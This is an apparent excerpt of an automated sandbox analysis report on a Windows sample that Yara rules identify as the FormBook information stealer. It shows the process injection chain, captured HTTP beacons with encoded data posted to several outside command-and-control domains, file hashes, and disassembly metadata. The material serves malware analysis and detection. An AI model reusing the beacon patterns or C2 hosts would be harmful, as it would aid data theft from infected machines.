                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yesonkoicasino.net
                                                                                      Origin: http://www.yesonkoicasino.net
                                                                                      Referer: http://www.yesonkoicasino.net/k9l7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 58816 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:41.983114958 CEST | 510 | OUT | GET /k9l7/?9jtPKX=iU7xlsxzkrYOaJ03UWKIE/axiGr8zrmLGOQkbwAH5ClgHUe+YliICefp5kzZp7Bcmm3TqloUqqhUnmvDpapz/R4DhNtLZW/YFSxpez1iYQ5aBHFQdfaf/M2d0rHEzcblh7f2Iqc=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yesonkoicasino.net
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Sep 30, 2024 10:44:42.426778078 CEST | 412 | IN | HTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Mon, 30 Sep 2024 08:44:42 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 272
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9jtPKX=iU7xlsxzkrYOaJ03UWKIE/axiGr8zrmLGOQkbwAH5ClgHUe+YliICefp5kzZp7Bcmm3TqloUqqhUnmvDpapz/R4DhNtLZW/YFSxpez1iYQ5aBHFQdfaf/M2d0rHEzcblh7f2Iqc=&YDT4P=4xd8DzO"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 58817 | 103.21.221.87 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:48.084320068 CEST | 787 | OUT | POST /v6un/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/v6un/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=RjD1aAvnLlO9Ejh+g0bHqU6LcBbMRcr5+SydwOJhO9NMrGv/j8lkrcyaEXAkZNLlt7xBznNDbB1FiXt+b+jN+UlJ7/VNby9f7hTSYCUGA9m6OaWtrEqirq/xflr45b7dVq66JVF7eZ8kxGnqZ3eyT7v2BaZ57vmcLaqk8bQtE/xcgQPQ1qXRR8Rr8PLdaXRK6vvWl93jOGdz
Sep 30, 2024 10:44:48.971019983 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Mon, 30 Sep 2024 08:44:48 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 58818 | 103.21.221.87 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:50.862643003 CEST | 811 | OUT | POST /v6un/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/v6un/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=RjD1aAvnLlO9FAp+iXzHt06ECRbMb8r9+S2dwP9xOOlMqmf/i9lkocyaM3AlH9Knt700ziNDbCJFiTl+bNLM/ElL0fVPWS9f7hTSYCBtA+W6NpetkA+lqq/yXFr4z77ZVq7XJQdRebEkxHXqZme1a7vwfqYxqOnqBZ74iqoQDtt8sGOKpZXyDsxp8NTva3Rg4vXW3q7EBy4Q1KChVmErJZc5fqgfBtBYPw==
Sep 30, 2024 10:44:51.684631109 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Mon, 30 Sep 2024 08:44:51 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 58819 | 103.21.221.87 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:53.443300009 CEST | 1824 | OUT | POST /v6un/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/v6un/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Sep 30, 2024 10:44:54.368901014 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Mon, 30 Sep 2024 08:44:54 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 58820 | 103.21.221.87 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:44:55.986051083 CEST | 512 | OUT | GET /v6un/?9jtPKX=chrVZ32YOFiHcRt+pEb6q26+CAONXtiHqnqOnPUfdfA3+GbGusUCqNq3OHoqQeyHuv1nxnx1V1BB8mdZJamKpk9z9Ox4e3tyzXPmXAU3O+O4NKGvlCfVuqLBbErpx4XOfLWdLVU=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Sep 30, 2024 10:44:56.893110037 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Mon, 30 Sep 2024 08:44:56 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 58821 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:45:02.011888981 CEST | 790 | OUT | POST /zeyp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.mondayigboleague.info
                                                                                      Origin: http://www.mondayigboleague.info
                                                                                      Referer: http://www.mondayigboleague.info/zeyp/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=drQ398BUeuEA3f27ytA/D2Mr3oWJUDohgwal0ayU/g6tbK6+EHdN+J+RDyCaWxKk+dNUATtAGLrkZ3JvJP+ER5Zk3WKJUW0fB2/IuEB3ae6OpzuXnw01FMuCTh6nsfm8HxQMejrjl7Nj1/t++SQtcKE30vJvVb85GCrWk1YdCrh1S1R1v8TLl6SlXYaXvNCckuk65FwHkp4z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 58822 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:45:04.549846888 CEST | 814 | OUT | POST /zeyp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.mondayigboleague.info
                                                                                      Origin: http://www.mondayigboleague.info
                                                                                      Referer: http://www.mondayigboleague.info/zeyp/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Ascii: 9jtPKX=drQ398BUeuEA3+G7+q0/EWMoyoWJPzolgwel0fK+8SetbqK+FGdN9J+RLSDeLBKr+dRcARJAGLvkZ1hvJ8WHRpZqrWKLLm0fB2/IuEU/aYSOoHSXlR0qb8uBUh6nofm4HxQ+ei3Fl/9j19l++GEiVKEx5PI/S7JOHAqVsUMke7kfXDQvzPTo3qynXaClvtC2muc6rS8grddQBSmhfi0KT6I8BUEyEENX4A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 58823 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:45:07.097801924 CEST | 1827 | OUT | POST /zeyp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.mondayigboleague.info
                                                                                      Origin: http://www.mondayigboleague.info
                                                                                      Referer: http://www.mondayigboleague.info/zeyp/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 58824 | 3.33.130.190 | 80 | 2360 | C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 10:45:10.167176962 CEST | 513 | OUT | GET /zeyp/?9jtPKX=Qp4X+LIjfewVnP6Y/skPG2AcibCDaQ9iuVCW0N7JhhnFM66mIUNO5YOiETDrAwi/zOtbLxRIZ8WmNUxfXqqXG7p6mEX8KWQILlPapVZ7FdK1llaTtR9WIeGVSAX1maOrISYOTkE=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.mondayigboleague.info
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Sep 30, 2024 10:45:10.616065025 CEST | 412 | IN | HTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Mon, 30 Sep 2024 08:45:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 272
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9jtPKX=Qp4X+LIjfewVnP6Y/skPG2AcibCDaQ9iuVCW0N7JhhnFM66mIUNO5YOiETDrAwi/zOtbLxRIZ8WmNUxfXqqXG7p6mEX8KWQILlPapVZ7FdK1llaTtR9WIeGVSAX1maOrISYOTkE=&YDT4P=4xd8DzO"}</script></head></html>


                                                                                      Target ID:0
                                                                                      Start time:04:41:04
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Users\user\Desktop\P030092024LANDWAY.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\P030092024LANDWAY.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'054'545 bytes
                                                                                      MD5 hash:3FFB03EF28AFF93D8CD6B83911D700EE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:04:41:10
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\P030092024LANDWAY.exe"
                                                                                      Imagebase:0xd00000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:04:41:31
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe"
                                                                                      Imagebase:0x840000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:7
                                                                                      Start time:04:41:34
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Windows\SysWOW64\cmdl32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\cmdl32.exe"
                                                                                      Imagebase:0x160000
                                                                                      File size:46'592 bytes
                                                                                      MD5 hash:BD60DF43E6419AFE39B3FCBFB14077E7
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:9
                                                                                      Start time:04:41:46
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe"
                                                                                      Imagebase:0x840000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:11
                                                                                      Start time:04:41:58
                                                                                      Start date:30/09/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff728280000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                        Execution Graph

                                                                                        Execution Coverage:1.4%
                                                                                        Dynamic/Decrypted Code Coverage:5%
                                                                                        Signature Coverage:14%
                                                                                        Total number of Nodes:121
                                                                                        Total number of Limit Nodes:7

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @j)$L$L
                                                                                        • API String ID: 0-2083849914
                                                                                        • Opcode ID: 271bcf04187c85e64262361b8b1fa458ff6e7d22e900a1545f025a1d405b9ba7
                                                                                        • Instruction ID: 2263ec9c81904febb31ee7711a99d95c1ab5b593920363bf7993c10253deb2be
                                                                                        • Opcode Fuzzy Hash: 271bcf04187c85e64262361b8b1fa458ff6e7d22e900a1545f025a1d405b9ba7
                                                                                        • Instruction Fuzzy Hash: 72F1A0B0D00219AFDF24DF94CC85AEEB7B8AF44304F1481AEE518A7341DB785A85CFA5

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 308 417653-41766f 309 417677-41767c 308->309 310 417672 call 42f0b3 308->310 311 417682-417690 call 42f6b3 309->311 312 41767e-417681 309->312 310->309 315 4176a0-4176b1 call 42da53 311->315 316 417692-41769d call 42f953 311->316 321 4176b3-4176c5 LdrLoadDll 315->321 322 4176ca-4176cd 315->322 316->315 323 4176c7 321->323 323->322
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 98eced4371543c88b8936ebc77b0720b60f507ae4c84dfee4b3ff002cccce43c
                                                                                        • Instruction ID: 892959356603833123e1c71540ef2e5d09206650632d8e43e8514516b00065a3
                                                                                        • Opcode Fuzzy Hash: 98eced4371543c88b8936ebc77b0720b60f507ae4c84dfee4b3ff002cccce43c
                                                                                        • Instruction Fuzzy Hash: 5C0171B2E0020DBBDF10DBE5DC42FDEB7789B54308F4081AAE90897241F634EB598B95

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 343 42c333-42c36c call 404993 call 42d543 NtClose
                                                                                        APIs
                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C367
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: c253ba5626deb7eecf88775f9a9b5acb02255364b3fd36f80c1dfc940615c145
                                                                                        • Instruction ID: f76d2b7edd7b4b746de9e2cfaadf3b0e67f654803069f6f876bdab61643147d2
                                                                                        • Opcode Fuzzy Hash: c253ba5626deb7eecf88775f9a9b5acb02255364b3fd36f80c1dfc940615c145
                                                                                        • Instruction Fuzzy Hash: B3E04F766402147BD620EB6ADC01F9B776CDBC9714F40442AFA08A7182C674B90086E4
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: de5b455dfe2440bb83c49f27617af67ad353f9e0ee9afe5f53598bf78526276a
